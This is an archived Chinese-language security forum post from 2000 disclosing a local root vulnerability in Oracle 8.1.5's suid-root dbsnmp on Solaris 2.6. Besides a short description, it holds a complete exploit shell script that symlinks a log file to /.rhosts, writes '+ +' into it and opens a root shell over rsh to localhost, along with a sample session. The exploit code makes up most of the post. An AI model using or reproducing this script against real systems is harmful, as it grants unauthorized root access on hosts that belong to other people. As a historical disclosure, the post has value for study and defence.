精华区 [关闭][返回]

当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>Oracle 8 严重漏洞

主题:Oracle 8 严重漏洞
发信人: [email protected]()
整理人: williamlong(2000-03-16 13:02:48), 站内信件

              

              Oracle 8 严重漏洞 

  综述: 

  Oracle 8.1.5 for UN*X存在普通用户可以得到root权限的漏洞。

  检验环境: 

  Oracle 8.1.5 on Solaris 2.6 SPARC 版本。 

  漏洞详细描述: 

  如果没有设置ORACLE_HOME,运行dbsnmp(缺省设置suid root/sgid dba)时
会在当前目录下产生两个log文
件:dbsnmpc 和 dbsnmpt 。如果这两个文件不存在,dbsnmpd将会创建属性为66
6、大小为400字节左右这两个文
件。如果这两个文件存在,dbsnmp将不改变此文件属性,并将400字节左右的输出
内容附加到这两个文件中。如
果root没有设置.rhosts文件,就可以通过创建一个/tmp/dbsnmpc 到 /.rhosts的
符号连接来得到root权限。 

  检验程序:

  oracle8% uname -a; id 
  SunOS oracle8 5.6 Generic_105181-05 sun4u sparc 
  SUNW,Ultra-5_10 
  uid=102(btellier) gid=10(staff) 
  oracle8% /tmp/oracle.sh 
  couldn't read file "/config/nmiconf.tcl": no such file or director

  Failed to initialize nl component,error=462 
  Failed to initialize nl component,error=462 
  # 
  --- oracle.sh --- 
  #!/bin/sh 
  # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others 
  # You'll probably have to change your path to dbsnmp 
  # Exploit will only work if /.rhosts does NOT exist 
  # 
  # Brock Tellier [email protected] 
  cd /tmp 
  unset ORACLE_HOME 
  umask 0000 
  ln -s /.rhosts /tmp/dbsnmpc.log 
  /u01/app/oracle/product/8.1.5/bin/dbsnmp 
  echo "+ +" > /.rhosts 
  rsh -l root localhost 'sh -i' 
  rsh -l root localhost rm /tmp/*log* 
  rsh -l root localhost rm /.rhosts 

--
欢迎大家常来回合策略  宗教信仰坐坐。
欢迎光临
魔法师学院http://wwwmagic.126.com
    
*    *    *    *    *
       
无挂碍故无有恐怖
                --
DOS--
                                      

※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.252]

[关闭][返回]